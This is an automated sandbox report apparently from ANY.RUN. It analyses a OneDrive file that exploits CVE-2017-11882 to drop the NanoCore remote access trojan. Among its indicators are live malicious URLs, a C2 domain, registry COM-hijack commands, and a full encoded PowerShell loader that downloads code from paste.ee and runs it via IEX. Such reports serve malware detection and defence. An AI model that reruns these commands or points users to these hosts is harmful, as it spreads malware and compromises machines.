URL:

https://onedrive.live.com/download?cid=AD0570F39967BFEB&resid=AD0570F39967BFEB%21853&authkey=AMG42zkJNVlHF_4&em=2&data=01|01|email@domain.ext|25925129758a45cb839d08d77d9d3f8f|9dfb1a055f1d449a896062abcb479e7d|0&sdata=ABL0PBoMCPl6PiO67lXSxyBpbXESaIvMBRnqjrhrxno=&reserved=0

Full analysis: https://app.any.run/tasks/ef08220c-811a-453b-b8f9-dd20a62a5077
Verdict: Malicious activity
Threats:

NanoCore is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework and it’s available for purchase for just $25 from its “official” website.

Malware Trends Tracker     >>>
Analysis date: December 10, 2019, 23:43:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
cve-2017-11882
rat
nanocore
Indicators:
MD5:

B72DF5776BE39266F36E9902A4A4FF44

SHA1:

72D0D821AD009DF04F79020299AB63A9B2F1C5B4

SHA256:

62AC84BA831BCE835274BC6E57DB62066A93A219C328716891B19A1677667F7E

SSDEEP:

6:2CkST/ZQuiudtgp6mHYblALcduFjdBQbdZuGUxCickZ4mDE:2dg/6Bp62YbOsuFQOt5vtQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2972)
      • EQNEDT32.EXE (PID: 436)
      • EQNEDT32.EXE (PID: 2932)

    • Executes PowerShell scripts

      • cmd.exe (PID: 2964)
      • cmd.exe (PID: 3168)
      • cmd.exe (PID: 3976)

    • NANOCORE was detected

      • MSBuild.exe (PID: 4036)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1600)
      • EQNEDT32.EXE (PID: 436)
      • cmd.exe (PID: 640)
      • EQNEDT32.EXE (PID: 2932)
      • cmd.exe (PID: 2236)
      • EQNEDT32.EXE (PID: 2972)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 1600)
      • cmd.exe (PID: 640)
      • cmd.exe (PID: 2236)

    • Application launched itself

      • cmd.exe (PID: 1600)
      • WINWORD.EXE (PID: 4000)
      • cmd.exe (PID: 640)
      • WINWORD.EXE (PID: 3212)
      • cmd.exe (PID: 2236)
      • WINWORD.EXE (PID: 2488)

    • Creates COM task schedule object

      • reg.exe (PID: 504)
      • reg.exe (PID: 992)
      • reg.exe (PID: 3580)

    • Starts Microsoft Office Application

      • chrome.exe (PID: 1412)
      • WINWORD.EXE (PID: 4000)
      • WINWORD.EXE (PID: 3212)
      • WINWORD.EXE (PID: 2488)

    • Creates files in the user directory

      • powershell.exe (PID: 3552)
      • MSBuild.exe (PID: 4036)
      • powershell.exe (PID: 3528)
      • powershell.exe (PID: 1292)
      • EQNEDT32.EXE (PID: 2972)

    • Executed via COM

      • EQNEDT32.EXE (PID: 436)
      • EQNEDT32.EXE (PID: 2932)
      • EQNEDT32.EXE (PID: 2972)

    • Modifies files in Chrome extension folder

      • chrome.exe (PID: 1412)

  • INFO

    • Reads the hosts file

      • chrome.exe (PID: 3584)
      • chrome.exe (PID: 1412)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2488)
      • WINWORD.EXE (PID: 4000)
      • WINWORD.EXE (PID: 3212)

    • Reads Internet Cache Settings

      • chrome.exe (PID: 1412)

    • Reads settings of System Certificates

      • chrome.exe (PID: 3584)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2488)
      • WINWORD.EXE (PID: 4000)
      • WINWORD.EXE (PID: 3660)
      • WINWORD.EXE (PID: 3212)
      • WINWORD.EXE (PID: 3692)
      • WINWORD.EXE (PID: 2924)

    • Application launched itself

      • chrome.exe (PID: 1412)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
93
Monitored processes
53
Malicious processes
11
Suspicious processes
1

Behavior graph

Click at the process to see the details
start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs eqnedt32.exe cmd.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs powershell.exe #NANOCORE msbuild.exe chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs eqnedt32.exe cmd.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs powershell.exe msbuild.exe no specs winword.exe no specs winword.exe no specs eqnedt32.exe cmd.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs powershell.exe msbuild.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
436"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
Modules
Images
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
504REG ADD HKCU\Software\Classes\CLSID\{fRXorORSWQVHXYKfMVMPjYyjdfGwkKrttcxCqXhJpYcuXdeieHoNajIpnOAHZEYFbAPnkDfyPhQIpMaMhINbRtKSHlbsemAU00e52-a214-4avecJnLmlekIVwVZtGbloDQzOKbyOlJXfOUWXvNbHRaMHZCsyoVMuFRsVPJwwYSMfdshccNOFMbTbWUF-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /fC:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
516"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1004,14066927090452032482,16307379942366358729,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=7852488937313390809 --mojo-platform-channel-handle=4556 --ignored=" --type=renderer " /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
640cmd /c ""C:\Users\admin\AppData\Roaming\ec13c.bat" "C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
776"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x729ba9d0,0x729ba9e0,0x729ba9ecC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
836"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1004,14066927090452032482,16307379942366358729,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=5322587747103790088 --mojo-platform-channel-handle=912 --ignored=" --type=renderer " /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
884"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1004,14066927090452032482,16307379942366358729,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=2899008068007059844 --mojo-platform-channel-handle=4552 --ignored=" --type=renderer " /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
992REG ADD HKCU\Software\Classes\CLSID\{fRXorORSWQVHXYKfMVMPjYyjdfGwkKrttcxCqXhJpYcuXdeieHoNajIpnOAHZEYFbAPnkDfyPhQIpMaMhINbRtKSHlbsemAU00e52-a214-4avecJnLmlekIVwVZtGbloDQzOKbyOlJXfOUWXvNbHRaMHZCsyoVMuFRsVPJwwYSMfdshccNOFMbTbWUF-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /fC:\Windows\system32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1016"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1004,14066927090452032482,16307379942366358729,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=4601906352889875403 --mojo-platform-channel-handle=4204 --ignored=" --type=renderer " /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
1292PowERsHELl.ExE /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AdABlADIAcgB4AC8AMAAnACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AQgBlAHUAcQBlACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAGsALgBIAGEAYwBrAGkAdAB1AHAAXQA6ADoAZQB4AGUAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
10 167
Read events
7 606
Write events
2 031
Delete events
530

Modification events

(PID) Process:(1412) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(1412) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(1412) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
Operation:writeName:StatusCodes
Value:
(PID) Process:(1412) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
Operation:writeName:StatusCodes
Value:
01000000
(PID) Process:(1412) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(4052) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
Operation:writeName:1412-13220495007179625
Value:
259
(PID) Process:(1412) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
Operation:writeName:dr
Value:
1
(PID) Process:(1412) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome
Operation:writeName:UsageStatsInSample
Value:
0
(PID) Process:(1412) chrome.exeKey:HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
Operation:delete valueName:1512-13197841398593750
Value:
0
(PID) Process:(1412) chrome.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}
Operation:writeName:usagestats
Value:
0
Executable files
0
Suspicious files
49
Text files
232
Unknown types
21

Dropped files

PID
Process
Filename
Type
1412chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\b57d728c-ab7c-45dc-a19c-e3908ad329fc.tmp
MD5:
SHA256:
1412chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000020.dbtmp
MD5:
SHA256:
1412chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.oldtext
MD5:
SHA256:
1412chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldtext
MD5:
SHA256:
1412chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old
MD5:
SHA256:
1412chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old~RF38e137.TMPtext
MD5:
SHA256:
1412chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.oldtext
MD5:
SHA256:
1412chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
MD5:
SHA256:
1412chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.old~RF38e195.TMPtext
MD5:
SHA256:
1412chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF38e157.TMPtext
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
74
DNS requests
36
Threats
18

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2972
EQNEDT32.EXE
GET
200
199.188.201.203:80
http://primedelivery.net/beer/cashout5734.bat
US
text
4.50 Kb
unknown
2932
EQNEDT32.EXE
GET
200
199.188.201.203:80
http://primedelivery.net/beer/cashout5734.bat
US
text
4.50 Kb
unknown
436
EQNEDT32.EXE
GET
200
199.188.201.203:80
http://primedelivery.net/beer/cashout5734.bat
US
text
4.50 Kb
unknown
3584
chrome.exe
GET
302
172.217.16.206:80
http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOTRmQUFXVHlhaGJaUTdMLWtCSkNJUl9ZQQ/1.0.0.5_nmmhkkegccagdldgiimedpiccmgmieda.crx
US
html
508 b
whitelisted
3584
chrome.exe
GET
302
172.217.16.206:80
http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOWVmQUFXS041NV9ZVXlJVWwxbGc5TUM4dw/7519.422.0.3_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx
US
html
513 b
whitelisted
3584
chrome.exe
GET
200
209.85.226.7:80
http://r2---sn-5hnekn76.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOWVmQUFXS041NV9ZVXlJVWwxbGc5TUM4dw/7519.422.0.3_pkedcjkdefgpdelpbcmbmeomcjbeemfm.crx?cms_redirect=yes&mip=85.203.44.11&mm=28&mn=sn-5hnekn76&ms=nvh&mt=1576021474&mv=m&mvi=1&pl=26&shardbypass=yes
US
crx
862 Kb
whitelisted
3584
chrome.exe
GET
200
209.85.226.10:80
http://r5---sn-5hnekn76.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvOTRmQUFXVHlhaGJaUTdMLWtCSkNJUl9ZQQ/1.0.0.5_nmmhkkegccagdldgiimedpiccmgmieda.crx?cms_redirect=yes&mip=85.203.44.11&mm=28&mn=sn-5hnekn76&ms=nvh&mt=1576021129&mv=u&mvi=4&pl=26&shardbypass=yes
US
crx
293 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3584
chrome.exe
172.217.18.163:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
3584
chrome.exe
13.107.42.13:443
onedrive.live.com
Microsoft Corporation
US
malicious
3584
chrome.exe
216.58.207.78:443
sb-ssl.google.com
Google Inc.
US
whitelisted
3584
chrome.exe
13.107.42.12:443
uzbwlg.am.files.1drv.com
Microsoft Corporation
US
suspicious
172.217.23.100:443
www.google.com
Google Inc.
US
whitelisted
2972
EQNEDT32.EXE
199.188.201.203:80
primedelivery.net
Namecheap, Inc.
US
unknown
8.8.8.8:53
Google Inc.
US
malicious
3552
powershell.exe
104.18.49.20:443
paste.ee
Cloudflare Inc
US
shared
4036
MSBuild.exe
185.140.53.85:24001
papacy.ddns.net
myLoc managed IT AG
DE
malicious
3584
chrome.exe
172.217.22.78:443
clients1.google.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
clientservices.googleapis.com
  • 172.217.18.163
whitelisted
onedrive.live.com
  • 13.107.42.13
shared
accounts.google.com
  • 172.217.22.109
shared
uzbwlg.am.files.1drv.com
  • 13.107.42.12
whitelisted
sb-ssl.google.com
  • 216.58.207.78
whitelisted
www.google.com
  • 172.217.23.100
malicious
ssl.gstatic.com
  • 216.58.210.3
whitelisted
primedelivery.net
  • 199.188.201.203
unknown
paste.ee
  • 104.18.49.20
  • 104.18.48.20
malicious
papacy.ddns.net
  • 185.140.53.85
malicious

Threats

PID
Process
Class
Message
4036
MSBuild.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
4036
MSBuild.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
4036
MSBuild.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
4036
MSBuild.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
4036
MSBuild.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
4036
MSBuild.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
4036
MSBuild.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
4036
MSBuild.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
4036
MSBuild.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
4036
MSBuild.exe
Potentially Bad Traffic
ET POLICY DNS Query to DynDNS Domain *.ddns .net
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://onedrive.live.com/download?cid=AD0570F39967BFEB&resid=AD0570F39967BFEB%21853&authkey=AMG42zkJNVlHF_4&em=2&data=01|01|email@domain.ext|25925129758a45cb839d08d77d9d3f8f|9dfb1a055f1d449a896062abcb479e7d|0&sdata=ABL0PBoMCPl6PiO67lXSxyBpbXESaIvMBRnqjrhrxno=&reserved=0